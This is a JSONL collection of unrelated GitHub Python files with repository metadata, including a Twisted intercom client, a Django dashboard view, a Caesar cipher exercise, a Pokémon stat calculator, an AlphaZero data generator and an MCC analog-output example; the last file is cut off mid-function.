+{"seq_id":"9263376454","text":"from __future__ import print_function\nimport time\nfrom schedule import Heap\nimport plugins\nfrom twisted.internet import reactor,protocol,endpoints,task\nfrom twisted.protocols.basic import LineReceiver\n\n__author__ = 'wstevens'\n\nclass IntercomProtocol(LineReceiver):\n\n def check(self):\n if not self.factory.heap.empty():\n run_time, cmd = self.factory.heap.peek()\n if run_time <= time.time():\n self.factory.heap.pop()\n cmd.act()\n\n def connectionMade(self):\n print(\"Connected successfully\")\n c = task.LoopingCall(self.check)\n c.start(5.0)\n\n def lineReceived(self, line):\n if line:\n parts = line.decode('utf-8','ignore').split(\"|\")\n if len(parts) >= 2:\n parts[0]=' '.join(parts[:-1])\n parts[1]=parts[-1]\n print(parts[1],\"New Message Recieved: \",parts[0])\n sc = plugins.command.SayCommand(parts[0])\n self.factory.heap.push(float(parts[1]), sc)\n \n\nclass IntercomClientFactory(protocol.ClientFactory):\n protocol = IntercomProtocol\n heap = Heap()\n\n def clientConnectionFailed(self, connector, reason):\n print('connection failed:', reason.getErrorMessage())\n time.sleep(5)\n connector.disconnect()\n connector.connect()\n \n def clientConnectionLost(self, connector, reason):\n print('connection lost:', reason.getErrorMessage())\n connector.disconnect()\n connector.connect()\n\n def buildProtocol(self, addr):\n p = self.protocol()\n p.factory = self\n return p\n\ntry:\n with open('server.key.txt') as f:\n server = f.read().strip()\nexcept Exception:\n server = 'localhost'\n\nconnector = reactor.connectTCP(server, 42124, IntercomClientFactory())\nprint('connecting to:',server)\nreactor.run()\n\n","repo_name":"wasv/intercom","sub_path":"client/client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":1869,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"39"}
+{"seq_id":"37128524240","text":"import json\nimport random\nfrom datetime import datetime, timedelta\n\nfrom django.db.models import Sum, Avg, Max\nfrom django.shortcuts import render\nfrom rest_framework.authtoken.models import Token\n\nfrom .models import UserData, Profile\n\n\ndef home_page(request):\n return render(request, 'Data/home_page.html', context={})\n\n\ndef ranking(request):\n # User token:\n # ----------------------------------------------------\n token = Token.objects.get(user=request.user) if request.user.is_authenticated else None\n\n # Best Contributors table:\n # ----------------------------------------------------\n\n # Get best first 25 contributors from db\n best_friends = Profile.objects.order_by('-score')[:25]\n\n # Format data to json for frontend\n bffs = [{'user': profile.user, 'score': profile.score, 'position': i + 1} for i, profile in enumerate(best_friends)]\n\n # Graph data:\n # ----------------------------------------------------\n\n # Creating list of days of this week\n days_this_week = []\n today = datetime.today().date()\n for i in range(8):\n date = (today + timedelta(days=-i))\n days_this_week.append(str(date))\n\n # Creating list of scores from this week\n score_this_week = []\n for i in range(8):\n score = sum([obj.score for obj in\n UserData.objects.filter(uploaded_at__date=datetime.today().date() - timedelta(days=i))])\n score_this_week.append(score)\n\n # Zipping scores and dates into one dict\n data = dict(zip(days_this_week, score_this_week))\n\n # Progress Bar data:\n # ----------------------------------------------------\n score_sum = Profile.objects.aggregate(Sum('score'))['score__sum']\n score_sum = score_sum if score_sum is not None else 0\n\n # Percent of individual help\n total_time_played = round(score_sum / 3600, 2)\n if request.user.is_authenticated and score_sum > 0:\n help_percent = round(100 * (Profile.objects.get(user=request.user).score) / score_sum, 1)\n else:\n help_percent = 0\n\n # Data Submitted:\n # ----------------------------------------------------\n if request.user.is_authenticated:\n uploads = UserData.objects.filter(user=request.user).order_by('-uploaded_at')\n\n user_data = []\n for upload in uploads:\n date = upload.uploaded_at.strftime('%Y-%m-%d %H:%M:%S')\n user_data.append({\"score\": upload.score, \"id\": upload.id, \"uploaded_at\": date})\n\n else:\n user_data = {}\n\n # Number of users:\n # ----------------------------------------------------\n n_users = Profile.objects.all().count()\n\n # Average number of frames per user\n # ----------------------------------------------------\n avg_user_score = Profile.objects.aggregate(Avg('score'))['score__avg']\n avg_user_score = round(avg_user_score) if avg_user_score is not None else 0\n\n # Average number of sessions per user\n # ----------------------------------------------------\n avg_session_score = UserData.objects.aggregate(Avg('score'))['score__avg']\n avg_session_score = round(avg_session_score) if avg_session_score is not None else 0\n\n avg_session_time = round(avg_session_score / 60, 2) if avg_session_score is not None else 0\n\n # Top 3 users\n # ----------------------------------------------------\n top_3_score_sum = Profile.objects.order_by('-score')[:3].aggregate(Sum('score'))['score__sum']\n if top_3_score_sum is not None and score_sum > 0:\n top_3_score_percent = round(100 * top_3_score_sum / score_sum, 2)\n else:\n top_3_score_percent = 0\n\n # Longest fishing session\n # ----------------------------------------------------\n max_score = 
UserData.objects.aggregate(Max('score'))['score__max']\n max_score_users = UserData.objects.filter(score=max_score)\n\n if max_score_users is not None and max_score is not None:\n rand_user = random.randint(0, len(max_score_users) - 1)\n\n max_score_user = [user for user in max_score_users][rand_user]\n time = round(max_score / 60, 1)\n else:\n max_score = 0\n max_score_user = 'admin'\n time = 0\n\n longest_session_dict = {'max_score': max_score, 'user': max_score_user, 'time': time}\n\n return render(request, 'Data/dashboard.html', context={\n\n 'bffs_dict': bffs,\n 'data': json.dumps(data),\n 'score_sum': score_sum,\n 'total_time_played': total_time_played,\n 'user_data': user_data,\n 'help_percent': help_percent,\n 'n_users': n_users,\n 'avg_user_score': avg_user_score,\n 'avg_session_score': avg_session_score,\n 'avg_session_time': avg_session_time,\n 'top_3_score_percent': top_3_score_percent,\n 'longest_session': longest_session_dict,\n 'token': token\n })\n","repo_name":"Setti7/Stardew-Web","sub_path":"Data/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4788,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"39"}
+{"seq_id":"15062741986","text":"import requests\n\n\n\nurl = \"https://httpbin.org/get\"\n\nargs = {\n \"nombre\":\"Juan\",\n \"curso\":\"python\",\n \"nivel\":\"intermedio\"\n }\n\nresponse = requests.get(url,params=args)\n\nprint(response.url)\n\nif response.status_code == 200:\n print(response.content)","repo_name":"AlexOlivaresP/CifradorFLASK","sub_path":"ejemploe/uno.py","file_name":"uno.py","file_ext":"py","file_size_in_byte":258,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"}
+{"seq_id":"17478133330","text":"import numpy as np\n\ndef get_data(mcts, max_moves=150, nnet=True, prop_thresh=30, verbose=0, return_moves=True):\n \"\"\"\n Gets the data that can be used to train an agent (typically a neural net). Uses MCTS\n to generate policies and rewards that are then returned.\n\n Params\n ------\n \n mcts: MCTS\n The monte carlo tree search object to use.\n\n max_moves: int, default=150\n The maximum number of moves the game can make before considering the game a draw.\n\n nnet: bool, default=False\n Whether the data should e acceptable to a neural network.\n\n prop_thresh: int, default=50\n Proportionality threshold for the prop constant in the mcts policy. The threshold defines the move\n after which the MCTS starts behaving greedily.\n\n verbose: int, default=0\n The verbosity of the state. Accepts 0 or 1 (verbose or not).\n\n return_move: bool, default=False\n Whether to return the number of moves as well as the data.\n\n Returns\n -------\n\n data: list\n The encoded data, containing training examples in the form [(state, target_pi, target_value),...].\n\n moves: int, optional\n The number of moves played. Only returns if return_move is True.\n \"\"\"\n memory = [] # place to store states as we play\n possible_moves = mcts.action_space\n game= mcts.game\n board_state = game.state()\n\n for move in range(max_moves):\n # get the game state and current player for the nn\n # TODO: allow for symmetric game\n # states = game.get_symmetries(nnet)\n state = game.state(nnet)\n cur_play = game.current_player()\n\n # use mcts to get a policy\n prop = int(move < prop_thresh)\n mcts.train()\n policy = mcts.get_policy(prop=prop)\n\n # choose an action based off this state\n act = np.random.choice(possible_moves, p=policy)\n\n # store the state, policy, and player\n #for state in states:\n # memory.append([state, policy, cur_play])\n memory.append([state, policy, cur_play])\n\n # perform this action\n s = game.state()\n game.move(act)\n mcts.update()\n if verbose:\n print(mcts.get_Qsa(s, act), mcts.get_Nsa(s, act), game.engine.result(), game.current_player())\n print(game.board())\n \n\n # check if the game is over\n v = game.winner()\n if v !=0:\n # game over state\n # it's currently the move of the loser, so v=-1\n # all states that have this player should have a v=-1\n # all states that have the other player should have v=1\n # so check the current player\n cur_play = game.current_player()\n # so if cur_play = sa.cur_play, return v=-1\n # if cur_play != sa.cur_play, return v=1\n data = [(x[0], x[1], v if x[2] == cur_play else -v) for x in memory]\n # reset the game\n game.set_state(board_state)\n mcts.update()\n if return_moves:\n return data, move+1\n return data\n # max moves was reached\n # here the outcome is a draw\n if verbose:\n print(\"Game ended in draw, max_moves was met\")\n v = 0\n data = [(x[0], x[1], v) for x in memory]\n game.set_state(board_state)\n mcts.update()\n if return_moves:\n return data, move+1\n return data","repo_name":"jasonrobwebster/alphazero-clone","sub_path":"coach/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":3395,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"39"}
+{"seq_id":"8047754542","text":"\"\"\"Caesar cipher.\"\"\"\n\n\ndef encode(message: str, shift: int):\n \"\"\"Encode a message using a Caesar cipher.\"\"\"\n new_message: str = \"\"\n if shift > 26: # If shift = 26 than it is the same letter\n shift %= 26 # Skips useless laps (lap = 26) and finds useful shift\n for element in message: # Loop checks every letter per iteration\n if ord(element) > 122 or 97 > ord(element): # Elements that not from a...z\n new_message += element # Leave item the same\n else:\n new_element = ord(element) + shift\n if new_element > 122:\n new_element = 96 + (new_element - 122) # Searches for element in range from a...z\n new_message += chr(new_element) # Adds new element\n else:\n new_message += chr(new_element)\n return new_message\n\n\nif __name__ == '__main__':\n print(encode(\"i like turtles\", 6)) # -> o roqk zaxzrky\n print(encode(\"o roqk zaxzrky\", 20)) # -> i like turtles\n print(encode(\"example\", 1)) # -> fybnqmf\n print(encode(\"don't change\", 0)) # -> don't change\n print(encode('the quick brown fox jumps over the lazy dog.', 7)) # -> aol xbpjr iyvdu mve qbtwz vcly aol shgf kvn.\n","repo_name":"aKaidalov/iti0102-2022","sub_path":"EX/ex02_math/caesar.py","file_name":"caesar.py","file_ext":"py","file_size_in_byte":1211,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"}
+{"seq_id":"72500347953","text":"\"\"\"Module instantiating a slithering animal\"\"\"\nfrom datetime import date\n\nclass Hognose:\n \"\"\"Class representing an animal\"\"\"\n def __init__(self, name, species):\n # Establish the properties of each animal\n # with a default value\n self.name = name\n self.species = species\n self.date_added = date.today()\n self.slithering = True\nbaby_cakes = Hognose(\"Baby Cakes\", \"Southern Hognose snake\")\nprint(baby_cakes)\n","repo_name":"dontcallmeplath/petting-zoo","sub_path":"slithering/Hognose.py","file_name":"Hognose.py","file_ext":"py","file_size_in_byte":453,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"}
+{"seq_id":"8268783834","text":"from __future__ import annotations\nfrom dataclasses import dataclass\nfrom fractions import Fraction\nfrom typing import Optional\n\nimport voluptuous as vlps\n\nfrom pkmn_stat_type import StatType, GenStatType\nfrom utils import enum_const_dict, multiplier_range_frac, IntRange, IntOrRange_T, FracRange, FracOrRange_T,\\\n\tFloatOrRange_T\nfrom nature import Nature\n\n\nLVL_RANGE = IntRange(1, 100)\n# Used in formulas\nLVL_NORM = 100\n\n\nclass BaseStats(enum_const_dict(StatType, int)):\n\tpass\n\n\nclass IVRanges(enum_const_dict(StatType, IntOrRange_T)):\n\tpass\n\n\nclass EVs(enum_const_dict(StatType, int)):\n\tpass\n\n\nclass Stats(enum_const_dict(StatType, IntOrRange_T)):\n\tpass\n\n\nclass GenStats(enum_const_dict(GenStatType, IntOrRange_T)):\n\tpass\n\n\nclass GenStatsNormalized(enum_const_dict(GenStatType, FloatOrRange_T)):\n\tpass\n\n\n@dataclass(slots=True)\nclass StatData:\n\tvalue: int = None\n\tiv: Optional[IntOrRange_T] = None\n\tev: Optional[IntOrRange_T] = None\n\n\t@classmethod\n\tdef bare_val(cls, value: int = None) -> StatData:\n\t\treturn cls(value=value, ev=0)\n\n\nclass StatsData(enum_const_dict(StatType, StatData)):\n\t...\n\n\n# Structure like:\n# {\n# StatType.HP: 100, # `value` argument\n# StatType.ATK: {\"value\": 70, \"ev\": 252},\n# StatType.DEF: {\"value\": 90, \"ev\": None, \"iv\": IntRange(4, 7)},\n# ...\n# }\nInputStatsData_T = dict[\n\tStatType,\n\tIntOrRange_T | None | dict[\n\t\tstr,\n\t\tIntOrRange_T | None\n\t]\n]\n\n\nNatureMult_T = int | Fraction\n\n\nclass Stat:\n\tBASE_RANGE = IntRange(0, 256)\n\tIV_RANGE = IntRange(0, 31)\n\tEV_RANGE = IntRange(0, 252)\n\n\tDEFAULT_MULT = 1\n\tINCREASED_MULT = Fraction(11, 10)\n\tDECREASED_MULT = Fraction(9, 10)\n\tMULT_RANGE = FracRange(DECREASED_MULT, INCREASED_MULT)\n\tPOSSIBLE_MULTS = DEFAULT_MULT, INCREASED_MULT, DECREASED_MULT\n\n\t@classmethod\n\tdef get_mult(cls, stat_type: StatType, nature: Nature):\n\t\tif stat_type == StatType.HP:\n\t\t\treturn None\n\t\telif nature.is_simple():\n\t\t\treturn cls.DEFAULT_MULT\n\t\telif stat_type == nature.increased:\n\t\t\treturn cls.INCREASED_MULT\n\t\telif stat_type == nature.decreased:\n\t\t\treturn cls.DECREASED_MULT\n\t\telse:\n\t\t\treturn cls.DEFAULT_MULT\n\n\tdef __init__(\n\t\tself,\n\t\ttype_: StatType,\n\t\tbase: int,\n\t\tlvl: int = None,\n\t\tval: int = None,\n\t\tiv: Optional[IntOrRange_T] = None,\n\t\tev: int = None,\n\t\tmult: Optional[NatureMult_T] = None\n\t):\n\t\tself._type = vlps.Schema(StatType)(type_)\n\t\tself._base = vlps.Schema(vlps.All(int, self.BASE_RANGE.in_validator))(base)\n\t\tself._lvl = vlps.Schema(vlps.Maybe(vlps.All(int, LVL_RANGE.in_validator)))(lvl)\n\t\tself._iv = vlps.Schema(vlps.Maybe(\n\t\t\tvlps.All(\n\t\t\t\tvlps.Any(IntRange, vlps.All(int, vlps.Coerce(IntRange))),\n\t\t\t\tself.IV_RANGE.in_validator,\n\t\t\t\tIntRange.is_straight_validator\n\t\t\t)\n\t\t))(iv)\n\t\tself._ev = vlps.Schema(vlps.Maybe(vlps.All(int, self.EV_RANGE.in_validator)))(ev)\n\n\t\tif type_ == StatType.HP:\n\t\t\t# For HP multiplier always is None (not used), but for protection\n\t\t\t# against gross typos:\n\t\t\tif mult is not None and mult != self.DEFAULT_MULT:\n\t\t\t\traise ValueError(f\"{StatType.HP} can not have nature multiplier\")\n\t\t\tself._mult = None\n\t\telif mult is None:\n\t\t\tself._mult = None\n\t\telse:\n\t\t\tself._mult = vlps.Schema(vlps.In(self.POSSIBLE_MULTS))(mult)\n\n\t\tif val is None:\n\t\t\tself._val = None\n\t\t\ttry:\n\t\t\t\tself._val = self.get_val()\n\t\t\texcept 
ValueError:\n\t\t\t\tpass\n\t\telse:\n\t\t\ttry:\n\t\t\t\tself._val = vlps.Schema(vlps.All(int, self.calc_val(\n\t\t\t\t\tself._type,\n\t\t\t\t\tself._base,\n\t\t\t\t\tself._iv,\n\t\t\t\t\tself._ev,\n\t\t\t\t\tself._lvl,\n\t\t\t\t\tself._mult\n\t\t\t\t).in_validator))(val)\n\t\t\texcept vlps.Error as e:\n\t\t\t\traise ValueError(f\"{self._type} {e}\")\n\n\t@property\n\tdef type(self) -> StatType:\n\t\treturn self._type\n\n\t@property\n\tdef base(self) -> int:\n\t\treturn self._base\n\n\t@classmethod\n\tdef _calc_hp_val(\n\t\tcls,\n\t\tbase: IntOrRange_T,\n\t\tlvl: IntOrRange_T,\n\t\tiv: IntOrRange_T,\n\t\tev: IntOrRange_T\n\t) -> IntOrRange_T:\n\t\treturn (2*base + iv + ev//4) * lvl // LVL_NORM + lvl + 10\n\n\t@classmethod\n\tdef _calc_non_hp_val(\n\t\tcls,\n\t\tbase: IntOrRange_T,\n\t\tlvl: IntOrRange_T,\n\t\tiv: IntOrRange_T,\n\t\tev: IntOrRange_T,\n\t\tmult: FracOrRange_T\n\t) -> IntOrRange_T:\n\t\tval = (2*base + iv + ev//4) * lvl // LVL_NORM + 5\n\t\tif mult != cls.DEFAULT_MULT:\n\t\t\tval = val * mult.numerator // mult.denominator\n\n\t\treturn val\n\n\t@classmethod\n\tdef _calc_val(\n\t\tcls,\n\t\ttype_: StatType,\n\t\tbase: IntOrRange_T,\n\t\tlvl: IntOrRange_T,\n\t\tiv: IntOrRange_T,\n\t\tev: IntOrRange_T,\n\t\tmult: Optional[FracOrRange_T] # None for HP.\n\t) -> IntOrRange_T:\n\t\tif type_ == StatType.HP:\n\t\t\treturn cls._calc_hp_val(base, lvl, iv, ev)\n\t\telse:\n\t\t\treturn cls._calc_non_hp_val(base, lvl, iv, ev, mult)\n\n\t@classmethod\n\tdef calc_val(\n\t\tcls,\n\t\ttype_: StatType,\n\t\tbase: IntOrRange_T,\n\t\tlvl: IntOrRange_T = None,\n\t\tiv: IntOrRange_T = None,\n\t\tev: IntOrRange_T = None,\n\t\tmult: Optional[NatureMult_T] = None\n\t) -> IntOrRange_T:\n\t\tif lvl is None:\n\t\t\tlvl = LVL_RANGE\n\n\t\tif iv is None:\n\t\t\tiv = cls.IV_RANGE\n\n\t\tif ev is None:\n\t\t\tev = cls.EV_RANGE\n\n\t\tif type_ == StatType.HP:\n\t\t\tif mult is not None:\n\t\t\t\traise ValueError(f\"{StatType.HP} can not have nature multiplier\")\n\t\telif mult is None:\n\t\t\tmult = cls.MULT_RANGE\n\n\t\treturn cls._calc_val(type_, base, lvl, iv, ev, mult)\n\n\tdef get_val(\n\t\tself,\n\t\tlvl: Optional[IntOrRange_T] = None,\n\t\tiv: Optional[IntOrRange_T] = None,\n\t\tev: Optional[IntOrRange_T] = None,\n\t\tmult: Optional[NatureMult_T] = None\n\t) -> IntOrRange_T:\n\t\t\"\"\"Get stat value.\"\"\"\n\t\tif lvl is None:\n\t\t\tlvl = self._lvl\n\n\t\tif iv is None:\n\t\t\tiv = self._iv\n\n\t\tif ev is None:\n\t\t\tev = self._ev\n\n\t\tif mult is None:\n\t\t\tmult = self._mult\n\n\t\treturn self.calc_val(self._type, self._base, lvl, iv, ev, mult)\n\n\tdef get_iv(\n\t\tself,\n\t\tlvl: int = None,\n\t\tval: int = None,\n\t\tev: Optional[IntOrRange_T] = None,\n\t\tmult: Optional[NatureMult_T] = None # None for self value\n\t) -> IntRange:\n\t\tif lvl is None:\n\t\t\tif self._lvl is None:\n\t\t\t\traise ValueError(\"Lvl must be specified\")\n\t\t\tlvl = self._lvl\n\n\t\tif val is None:\n\t\t\tif self._val is None:\n\t\t\t\traise ValueError(\"Stat value must be specified\")\n\t\t\tval = self._val\n\n\t\tif ev is None:\n\t\t\tev = self._ev\n\n\t\tif mult is None:\n\t\t\tif self._mult is None and self._type != StatType.HP:\n\t\t\t\traise ValueError(\"Nature multiplier must be specified\")\n\t\t\tmult = self._mult\n\n\t\t# HP = (2*base + iv + ev//4) * lvl // LVL_NORM + lvl + 10\n\t\t# NON_HP = ((2*base + iv + ev//4) * lvl // LVL_NORM + 5) * mult\n\n\t\tif self._type == StatType.HP:\n\t\t\trange_ = val - 10 - lvl\n\t\telif mult != self.DEFAULT_MULT:\n\t\t\trange_ = multiplier_range_frac(mult, val) - 
5\n\t\telse:\n\t\t\trange_ = val - 5\n\n\t\trange_ = multiplier_range_frac(Fraction(lvl, LVL_NORM), range_)\n\t\trange_ -= 2*self._base + ev//4\n\t\ttry:\n\t\t\trange_.clamp(self.IV_RANGE)\n\t\texcept ValueError as e:\n\t\t\traise ValueError(f\"Calculated {self._type.name} IVs are impossible: {e}\") from e\n\n\t\treturn range_\n\n\ndef main():\n\tlvl = 78\n\n\t# stats = [\n\t# \tStat(StatType.HP, base=108, iv=24, lvl=lvl, ev=74),\n\t# \tStat(StatType.ATK, base=130, iv=12, lvl=lvl, ev=190, mult=Stat.INCREASED_MULT),\n\t# \tStat(StatType.DEF, base=95, iv=30, lvl=lvl, ev=91),\n\t# \tStat(StatType.SPATK, base=80, iv=16, lvl=lvl, ev=48, mult=Stat.DECREASED_MULT),\n\t# \tStat(StatType.SPDEF, base=85, iv=23, lvl=lvl, ev=84),\n\t# \tStat(StatType.SPEED, base=102, iv=5, lvl=lvl, ev=23)\n\t# ]\n\t# for stat in stats:\n\t# \tprint(f\"{stat._type.name}: {stat.get_val(lvl)}\")\n\n\tstats = [\n\t\tStat(StatType.HP, base=108, val=289, lvl=lvl, ev=74), # 24\n\t\tStat(StatType.ATK, base=130, val=278, lvl=lvl, ev=190, mult=Stat.INCREASED_MULT), # 12\n\t\tStat(StatType.DEF, base=95, val=193, lvl=lvl, ev=91), # 30\n\t\tStat(StatType.SPATK, base=80, val=135, lvl=lvl, ev=48, mult=Stat.DECREASED_MULT), # 16\n\t\tStat(StatType.SPDEF, base=85, val=171, lvl=lvl, ev=84), # 23\n\t\tStat(StatType.SPEED, base=102, val=171, lvl=lvl, ev=23) # 5\n\t]\n\n\tfor stat in stats:\n\t\tprint(f\"{stat.type.name}: {stat.get_iv()}\")\n\tprint()\n\n\tstats = [\n\t\tStat(StatType.HP, base=70, val=54, lvl=17), # 24\n\t\tStat(StatType.ATK, base=110, val=45, lvl=17), # 12\n\t\tStat(StatType.DEF, base=180, val=60, lvl=17, mult=Stat.DECREASED_MULT), # 30\n\t\tStat(StatType.SPATK, base=60, val=28, lvl=17), # 16\n\t\tStat(StatType.SPDEF, base=60, val=30, lvl=17, mult=Stat.INCREASED_MULT), # 23\n\t\tStat(StatType.SPEED, base=50, val=22, lvl=17) # 5\n\t]\n\n\tfor stat in stats:\n\t\tprint(f\"{stat.type.name}: {stat.get_iv()}\")\n\tprint()\n\n\tlvl = 50\n\tprint(Stat.calc_val(type_=StatType.HP, base=70, lvl=lvl))\n\tprint(Stat.calc_val(type_=StatType.ATK, base=110, lvl=lvl))\n\tprint(Stat.calc_val(type_=StatType.DEF, base=180, lvl=lvl))\n\tprint(Stat.calc_val(type_=StatType.SPATK, base=60, lvl=lvl))\n\tprint(Stat.calc_val(type_=StatType.SPDEF, base=60, lvl=lvl))\n\tprint(Stat.calc_val(type_=StatType.SPEED, base=50, lvl=lvl))\n\tprint()\n\n\tlvl = 100\n\tprint(Stat.calc_val(type_=StatType.HP, base=70, lvl=lvl))\n\tprint(Stat.calc_val(type_=StatType.ATK, base=110, lvl=lvl))\n\tprint(Stat.calc_val(type_=StatType.DEF, base=180, lvl=lvl))\n\tprint(Stat.calc_val(type_=StatType.SPATK, base=60, lvl=lvl))\n\tprint(Stat.calc_val(type_=StatType.SPDEF, base=60, lvl=lvl))\n\tprint(Stat.calc_val(type_=StatType.SPEED, base=50, lvl=lvl))\n\tprint()\n\n\n\t# sd = StatsData({\n\t# \tStatType.HP: StatData(51),\n\t# \tStatType.ATK: StatData(17),\n\t# \tStatType.DEF: StatData(39),\n\t# \tStatType.SPATK: StatData(15),\n\t# \tStatType.SPDEF: StatData(18),\n\t# \tStatType.SPEED: StatData(51)\n\t# })\n\t# pretty_print(sd)\n\n\t# print(multiplier_range_frac(Fraction(76, 100), 200))\n\t# print()\n\t# print(multiplier_range_frac(Fraction(13, 100), 51))\n\t#\n\t# sd = StatsData({\n\t# \tst: StatData()\n\t# \tfor st in StatType\n\t# })\n\t# pretty_print(sd)\n\n\nif __name__ == \"__main__\":\n\tmain()\n","repo_name":"Avorthoren/pkmn_py","sub_path":"pkmn_stat.py","file_name":"pkmn_stat.py","file_ext":"py","file_size_in_byte":9533,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"}
+{"seq_id":"4586284056","text":"from flask import Flask, render_template, jsonify\nimport json\nfrom crime import SeattlePDApi\n\napp = Flask(__name__)\n\n\n@app.route('/')\ndef index():\n return render_template('index.html', title=\"Home\")\n\n\n@app.route('/api/raw')\n@app.route('/api/raw/')\ndef api_raw(limit=20):\n path = r'C:\\dev\\jim\\seattle_crime\\exports\\raw_json_20181102.json'\n with open(path, 'r') as _f:\n data = json.load(_f)\n _f.close()\n \n if limit:\n data = data[:limit]\n return jsonify(data)\n\n@app.route('/api/bydate')\ndef crime_by_date():\n s = SeattlePDApi()\n data = s.get_crimes_by_date()\n return jsonify(data)","repo_name":"cryocaustik/PyApiToHtml","sub_path":"server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":636,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"}
+{"seq_id":"8059211252","text":"from load_modules import *\n\n#run_type = 1 # indiv script selection 0 = save only / 1 = show only / 2 = save and show\n\nCoM_trace = np.empty([1,4])# np.empty(4) # first 3 columns = coords, 4th = time/scale factor\n\ni = 0\nwhile True:\n\ttry:\n\t\tfname = get_snap_filename('../Output', i*10)\n\t\tR = np.asarray(get_snap_data(fname, 1, 'Coordinates'))\n#\t\tprint(fname)\n\t\tn = get_attribute(fname,'NumPart_ThisFile')[1]\n\t\tM = np.full(n, 1)\n\t\tR_CoM = find_CoM(R, M)\n\t\ta = get_attribute(fname,'Time')\n\t\tstack = np.hstack((R_CoM,a))\n\t\tCoM_trace = np.append(CoM_trace, [stack], axis=0)\n#\t\tprint(CoM_trace[i])\n\texcept(KeyError, OSError, NameError, UnboundLocalError, IOError):\n\t\tbreak\n\telse:\n i += 1\n#print(CoM_trace)\n\n#projection in xy, xz, yz planes\n\nfig1 = plt.figure()\nax = fig1.add_subplot(projection='3d')\nax.scatter3D(CoM_trace[:,0], CoM_trace[:,1], CoM_trace[:,2])\nplt.title('Plot tracing halo CoM location through time [IC]')\nax.set_xlabel(r'$x\\; [kpc]$')\nax.set_ylabel(r'$y\\; [kpc]$')\nax.set_zlabel(r'$z\\; [kpc]$')\n\n\n#### BULK RUN OPTIONS ####\n\nif run_type == 0 or run_type == 2:\n\tfig1.savefig('./IC_halo_plots/IC_halo_CoM_trace.pdf') \n\nif run_type == 1 or run_type == 2:\n plt.show()\n\n\n","repo_name":"UONGGuy/DynamicalFriction_on_SMBH_scripts","sub_path":"halo_scripts/halo_CoM_trace.py","file_name":"halo_CoM_trace.py","file_ext":"py","file_size_in_byte":1205,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"}
+{"seq_id":"74244491954","text":"import setuptools\nimport os\n\n# Open and read README.md\nwith open(\"README.md\", \"r\") as fh:\n long_description = fh.read()\n\n# Open and read requirements.txt\nbaseDir = os.path.dirname(os.path.realpath(__file__))\nrequirements_path = baseDir + '/requirements.txt'\ninstall_requires = []\nif os.path.isfile(requirements_path):\n with open(requirements_path, 'r') as f:\n install_requires = f.read().splitlines()\n\nsetuptools.setup(\n name=\"BeautifulSites4\",\n version=\"1.1.1-alpha\",\n author=\"HipyCas\",\n author_email=\"hipycas+python@gmail.com\",\n description=\"An implementation of BeautifulSoup4 for some popular webpages\",\n long_description=long_description,\n long_description_content_type=\"text/markdown\",\n url=\"https://github.com/HipyCas/BeautifulSites\",\n packages=setuptools.find_packages(),\n install_requires=install_requires,\n classifiers=[\n \"Programming Language :: Python :: 3\",\n \"License :: OSI Approved :: MIT License\",\n \"Operating System :: OS Independent\",\n ],\n)\n","repo_name":"HipyCas/BeautifulSites","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1029,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"39"}
+{"seq_id":"9797828346","text":"from __future__ import absolute_import, division, print_function\n\nimport math\n\nfrom builtins import * # @UnusedWildImport\nfrom tkinter import messagebox\n\nfrom mcculw import ul\nfrom mcculw.enums import Status, FunctionType, ScanOptions\nfrom examples.ui.uiexample import UIExample\nfrom examples.props.ao import AnalogOutputProps\nfrom mcculw.ul import ULError\nimport tkinter as tk\n\n\nclass ULAO04(UIExample):\n def __init__(self, master=None):\n super(ULAO04, self).__init__(master)\n\n self.board_num = 0\n self.ao_props = AnalogOutputProps(self.board_num)\n\n self.create_widgets()\n\n def start_scan(self):\n # Build the data array\n self.low_chan = self.get_low_channel_num()\n self.high_chan = self.get_high_channel_num()\n self.num_chans = self.high_chan - self.low_chan + 1\n\n if self.low_chan > self.high_chan:\n messagebox.showerror(\n \"Error\",\n \"Low Channel Number must be greater than or equal to High \"\n \"Channel Number\")\n self.set_ui_idle_state()\n return\n\n points_per_channel = 1000\n rate = 1000\n num_points = self.num_chans * points_per_channel\n scan_options = (ScanOptions.BACKGROUND |\n ScanOptions.CONTINUOUS | ScanOptions.SCALEDATA)\n ao_range = self.ao_props.available_ranges[0]\n\n self.memhandle = ul.scaled_win_buf_alloc(num_points)\n\n # Check if the buffer was successfully allocated\n if not self.memhandle:\n messagebox.showerror(\"Error\", \"Failed to allocate memory\")\n self.start_button[\"state\"] = tk.NORMAL\n return\n\n try:\n data_array = self.memhandle_as_ctypes_array_scaled(\n self.memhandle)\n frequencies = self.add_example_data(\n data_array, ao_range, self.num_chans, rate,\n points_per_channel)\n\n self.recreate_freq_frame()\n self.display_signal_info(frequencies)\n\n ul.a_out_scan(\n self.board_num, self.low_chan, self.high_chan, num_points,\n rate, ao_range, self.memhandle, scan_options)\n\n # Start updating the displayed values\n self.update_displayed_values()\n except ULError as e:\n self.show_ul_error(e)\n self.set_ui_idle_state()\n return\n\n def display_signal_info(self, frequencies):\n for channel_num in range(self.low_chan, self.high_chan + 1):\n curr_row = channel_num - self.low_chan\n self.freq_labels[curr_row][\"text\"] = str(\n frequencies[curr_row]) + \" Hz\"\n\n def add_example_data(self, data_array, ao_range, num_chans,\n rate, points_per_channel):\n # Calculate frequencies that will work well with the size of the array\n frequencies = []\n for channel_num in range(0, num_chans):\n frequencies.append(\n (channel_num + 1) / (points_per_channel / rate))\n\n # Calculate an amplitude and y-offset for the signal\n # to fill the analog output range\n amplitude = (ao_range.range_max - ao_range.range_min) / 2\n y_offset = (amplitude + ao_range.range_min) / 2\n\n # Fill the array 